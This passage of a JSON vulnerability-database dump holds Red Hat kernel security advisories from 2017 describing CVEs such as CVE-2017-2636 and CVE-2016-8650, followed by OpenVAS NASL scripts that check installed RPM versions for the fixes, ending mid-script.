A flaw was found in the Linux kernel's implementation of setsockopt for the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with non-namespace CAP_NET_ADMIN are able to trigger this call and create a situation in which the sockets sendbuff data size could be negative. This could adversely affect memory allocations and create situations where the system could crash or cause memory corruption. (CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux attributes on /proc/pid/attr files. An empty (null) write to this file can crash the system by causing the system to attempt to access unmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting CVE-2017-2636; Andrey Konovalov (Google) for reporting CVE-2017-6074; and Ralf Spenneberg for reporting CVE-2016-8650. The CVE-2017-2618 issue was discovered by Paul Moore (Red Hat Engineering).\n\nBug Fix(es):\n\n* The kernel-rt packages have been upgraded to version 3.10.0-514.rt56.219, which provides a number of bug fix updates over the previous version. (BZ#1429613)", "reporter": "RedHat", "published": "2017-04-12T14:32:45", "type": "redhat", "title": "(RHSA-2017:0932) Important: kernel-rt security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-8650", "CVE-2016-9793", "CVE-2017-2618", "CVE-2017-2636", "CVE-2017-6074"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T18:14:51", "id": "RHSA-2017:0932", "href": "https://access.redhat.com/errata/RHSA-2017:0932", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:42:38", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.rt56.437.el7", "arch": "src", "packageName": "kernel-rt", "packageFilename": "kernel-rt-3.10.0-514.16.1.rt56.437.el7.src.rpm", "operator": "lt"}], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt for the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with non-namespace CAP_NET_ADMIN are able to trigger this call and create a situation in which the sockets sendbuff data size could be negative. This could adversely affect memory allocations and create situations where the system could crash or cause memory corruption. (CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux attributes on /proc/pid/attr files. An empty (null) write to this file can crash the system by causing the system to attempt to access unmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting CVE-2017-2636 and Ralf Spenneberg for reporting CVE-2016-8650. The CVE-2017-2618 issue was discovered by Paul Moore (Red Hat Engineering).\n\nBug Fix(es):\n\n* Previously, a cgroups data structure was sometimes corrupted due to a race condition in the kernel-rt cgroups code. Consequently, several system tasks were blocked, and the operating system became unresponsive. This update adds a lock that prevents the race condition. As a result, the cgroups data structure no longer gets corrupted and the operating system no longer hangs under the described circumstances. (BZ#1420784)\n\n* The kernel-rt packages have been upgraded to the 3.10.0-514.16.1 source tree, which provides a number of bug fixes over the previous version. (BZ#1430749)", "reporter": "RedHat", "published": "2017-04-12T14:29:33", "type": "redhat", "title": "(RHSA-2017:0931) Important: kernel-rt security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-8650", "CVE-2016-9793", "CVE-2017-2618", "CVE-2017-2636"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-03-19T16:29:53", "id": "RHSA-2017:0931", "href": "https://access.redhat.com/errata/RHSA-2017:0931", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:43:42", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-573.42.1.el6", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.32-573.42.1.el6.i686.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important)\n\nRed Hat would like to thank Alexander Popov for reporting this issue.", "reporter": "RedHat", "published": "2017-05-16T13:06:20", "type": "redhat", "title": "(RHSA-2017:1233) Important: kernel security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-2636"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-05-16T13:14:09", "id": "RHSA-2017:1233", "href": "https://access.redhat.com/errata/RHSA-2017:1233", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:42:59", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.71.1.el6", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-2.6.32-220.71.1.el6.src.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important)\n\nRed Hat would like to thank Alexander Popov for reporting this issue.", "reporter": "RedHat", "published": "2017-04-25T13:21:16", "type": "redhat", "title": "(RHSA-2017:1126) Important: kernel security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-2636"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-04-25T13:23:48", "id": "RHSA-2017:1126", "href": "https://access.redhat.com/errata/RHSA-2017:1126", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:44:05", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.78.1.el6", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-2.6.32-358.78.1.el6.src.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important)\n\nRed Hat would like to thank Alexander Popov for reporting this issue.", "reporter": "RedHat", "published": "2017-04-18T13:16:05", "type": "redhat", "title": "(RHSA-2017:0986) Important: kernel security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-2636"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-04-18T13:18:08", "id": "RHSA-2017:0986", "href": "https://access.redhat.com/errata/RHSA-2017:0986", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:41:52", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.53.1.el7", "arch": "ppc64", "packageName": "kernel", "packageFilename": "kernel-3.10.0-327.53.1.el7.ppc64.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important)\n\nRed Hat would like to thank Alexander Popov for reporting this issue.\n\nBug Fix(es):\n\n* Previously, memory allocation in the libceph kernel module did not work correctly. Consequently, the file system on a RADOS Block Device(RBD) could become unresponsive in the situations under high memory pressure. With this update, the underlying source code has been fixed, and the file system no longer hangs in the described scenario. (BZ#1418314)\n\n* Previously, the mpt3sas driver incorrectly checked the Transport Layer Retries (TLR) state even on Redundant Array Of Independent Discs (RAID) devices. Consequently, a kernel panic occurred when mpt3sas attempted to read from the RAID devices. With this update, mpt3sas has been fixed to check the TLR state only for non-RAID devices, and the kernel no longer panics under the described circumstances. (BZ#1427453)", "reporter": "RedHat", "published": "2017-04-25T13:20:19", "type": "redhat", "title": "(RHSA-2017:1125) Important: kernel security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-2636"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-08-28T06:44:17", "id": "RHSA-2017:1125", "href": "https://access.redhat.com/errata/RHSA-2017:1125", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:41:01", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.80.1.el6", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-2.6.32-431.80.1.el6.src.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important)\n\nRed Hat would like to thank Alexander Popov for reporting this issue.", "reporter": "RedHat", "published": "2017-05-16T13:05:54", "type": "redhat", "title": "(RHSA-2017:1232) Important: kernel security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-2636"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-05-16T13:11:12", "id": "RHSA-2017:1232", "href": "https://access.redhat.com/errata/RHSA-2017:1232", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T19:40:42", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.32-696.1.1.el6.i686.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel's implementation of seq_file where a local attacker could manipulate memory in the put() function pointer. This could lead to memory corruption and possible privileged escalation. (CVE-2016-7910, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting CVE-2017-2636.\n\nBug Fix(es):\n\n* Previously, Chelsio firmware included an incorrectly-formatted firmware bin file. As a consequence, the firmware could not be flashed. This update provides a firmware bin file that is formatted correctly. As a result, Chelsio firmware can now be flashed successfully. (BZ#1433865)\n\n* When multiple simultaneous processes attempted to read from the /proc/stat file, spinlock overhead was generated on Non-Uniform Memory Access (NUMA) systems. Consequently, a large amount of CPU was consumed. With this update, the underlying source code has been fixed to avoid taking spinlock when the interrupt line does not exist. As a result, the spinlock overhead is now generated less often, and multiple simultaneous processes can now read /proc/stat without consuming a large amount of CPU. (BZ#1428106)", "reporter": "RedHat", "published": "2017-04-11T14:30:37", "type": "redhat", "title": "(RHSA-2017:0892) Important: kernel security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7910", "CVE-2017-2636"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T18:22:01", "id": "RHSA-2017:0892", "href": "https://access.redhat.com/errata/RHSA-2017:0892", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:42:38", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-504.60.2.el6", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-2.6.32-504.60.2.el6.src.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A flaw was found in the way memory was being allocated on the stack for user space binaries. If heap (or different memory region) and stack memory regions were adjacent to each other, an attacker could use this flaw to jump over the stack guard gap, cause controlled memory corruption on process stack or the adjacent memory region, and thus increase their privileges on the system. This is a kernel-side mitigation which increases the stack guard gap size from one page to 1 MiB to make successful exploitation of this issue more difficult. (CVE-2017-1000364, Important)\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important)\n\nRed Hat would like to thank Qualys Research Labs for reporting CVE-2017-1000364 and Alexander Popov for reporting CVE-2017-2636.\n\nBug Fix(es):\n\n* Previously, the kdump mechanism was trying to get the lock by the vmalloc_sync_all() function during a kernel panic. Consequently, a deadlock occurred, and the crashkernel did not boot. This update fixes the vmalloc_sync_all() function to avoid synchronizing the vmalloc area on the crashing CPU. As a result, the crashkernel parameter now boots as expected, and the kernel dump is collected successfully under the described circumstances. (BZ#1443497)\n\n* Previously, a kernel panic occurred when the mcelog daemon executed a huge page memory offline. This update fixes the HugeTLB feature of the Linux kernel to check for the Page Table Entry (PTE) NULL pointer in the page_check_address() function. As a result, the kernel panic no longer occurs under the described circumstances. (BZ#1444349)\n\n* Previously, the vmw_pvscsi driver reported most successful aborts as FAILED due to a bug in vmw_pvscsi abort handler. This update fixes the handler, and successful aborts are no longer reported as FAILED. (BZ#1442966)", "reporter": "RedHat", "published": "2017-06-19T19:03:12", "type": "redhat", "title": "(RHSA-2017:1488) Important: kernel security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000364", "CVE-2017-2636"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-08-29T09:30:57", "id": "RHSA-2017:1488", "href": "https://access.redhat.com/errata/RHSA-2017:1488", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-11-19T12:57:26", "references": ["https://access.redhat.com/articles/2986951", "2017:0933-01", "https://www.redhat.com/archives/rhsa-announce/2017-April/msg00019.html"], "pluginID": "1361412562310871796", "description": "The remote host is missing an update for the ", "edition": 7, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-04-13T00:00:00", "title": "RedHat Update for kernel RHSA-2017:0933-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8650", "CVE-2016-9793", "CVE-2017-2636", "CVE-2017-2618"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310871796", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871796", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2017:0933-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871796\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-13 06:32:31 +0200 (Thu, 13 Apr 2017)\");\n script_cve_id(\"CVE-2016-8650\", \"CVE-2016-9793\", \"CVE-2017-2618\", \"CVE-2017-2636\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2017:0933-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\n kernel, the core of any Linux operating system.\n\nThese updated kernel packages include several security issues and numerous\nbug fixes. Space precludes documenting all of these bug fixes in this\nadvisory. To see the complete list of bug fixes, users are directed to the\nrelated Knowledge Article.\n\nSecurity Fix(es):\n\n * A race condition flaw was found in the N_HLDC Linux kernel driver when\naccessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty device\ncould use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n * A flaw was found in the Linux kernel key management subsystem in which a\nlocal attacker could crash the kernel or corrupt the stack and additional\nmemory (denial of service) by supplying a specially crafted RSA key. This\nflaw panics the machine during the verification of the RSA key.\n(CVE-2016-8650, Moderate)\n\n * A flaw was found in the Linux kernel's implementation of setsockopt for\nthe BUFFORCE setsockopt() system call. Users with non-namespace\nCAP_NET_ADMIN are able to trigger this call and create a situation in which\nthe sockets sendbuff data size could be negative. This could adversely\naffect memory allocations and create situations where the system could\ncrash or cause memory corruption. (CVE-2016-9793, Moderate)\n\n * A flaw was found in the Linux kernel's handling of clearing SELinux\nattributes on /proc/pid/attr files. An empty (null) write to this file can\ncrash the system by causing the system to attempt to access unmapped kernel\nmemory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting CVE-2017-2636 and\nRalf Spenneberg for reporting CVE-2016-8650. The CVE-2017-2618 issue was\ndiscovered by Paul Moore (Red Hat Engineering).\");\n script_tag(name:\"affected\", value:\"kernel on\n Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:0933-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-April/msg00019.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/2986951\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~514.16.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~514.16.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.16.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~514.16.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.10.0~514.16.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~514.16.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~514.16.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~514.16.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.16.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.16.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~514.16.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~3.10.0~514.16.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.16.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~514.16.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~3.10.0~514.16.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~514.16.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~3.10.0~514.16.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-26T14:14:32", "references": ["2017:0933", "http://lists.centos.org/pipermail/centos-announce/2017-April/022385.html"], "pluginID": "1361412562310882694", "description": "Check the version of kernel", "edition": 5, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-04-14T00:00:00", "title": "CentOS Update for kernel CESA-2017:0933 centos7 ", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8650", "CVE-2016-9793", "CVE-2017-2636", "CVE-2017-2618"], "modified": "2018-09-26T00:00:00", "id": "OPENVAS:1361412562310882694", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882694", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2017:0933 centos7 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882694\");\n script_version(\"$Revision: 11610 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-26 04:42:29 +0200 (Wed, 26 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-14 06:30:31 +0200 (Fri, 14 Apr 2017)\");\n script_cve_id(\"CVE-2016-8650\", \"CVE-2016-9793\", \"CVE-2017-2618\", \"CVE-2017-2636\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2017:0933 centos7 \");\n script_tag(name: \"summary\", value: \"Check the version of kernel\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help \nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The kernel packages contain the Linux kernel, \nthe core of any Linux operating system.\n\nThese updated kernel packages include several security issues and numerous\nbug fixes. Space precludes documenting all of these bug fixes in this\nadvisory. To see the complete list of bug fixes, users are directed to the\nrelated Knowledge Article: 'https://access.redhat.com/articles/2986951'.\n\nSecurity Fix(es):\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver when\naccessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty device\ncould use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in which a\nlocal attacker could crash the kernel or corrupt the stack and additional\nmemory (denial of service) by supplying a specially crafted RSA key. This\nflaw panics the machine during the verification of the RSA key.\n(CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt for\nthe SO_{SND RCV}BUFFORCE setsockopt() system call. Users with non-namespace\nCAP_NET_ADMIN are able to trigger this call and create a situation in which\nthe sockets sendbuff data size could be negative. This could adversely\naffect memory allocations and create situations where the system could\ncrash or cause memory corruption. (CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux\nattributes on /proc/pid/attr files. An empty (null) write to this file can\ncrash the system by causing the system to attempt to access unmapped kernel\nmemory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting CVE-2017-2636 and\nRalf Spenneberg for reporting CVE-2016-8650. The CVE-2017-2618 issue was\ndiscovered by Paul Moore (Red Hat Engineering).\n\");\n script_tag(name: \"affected\", value: \"kernel on CentOS 7\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"CESA\", value: \"2017:0933\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2017-April/022385.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 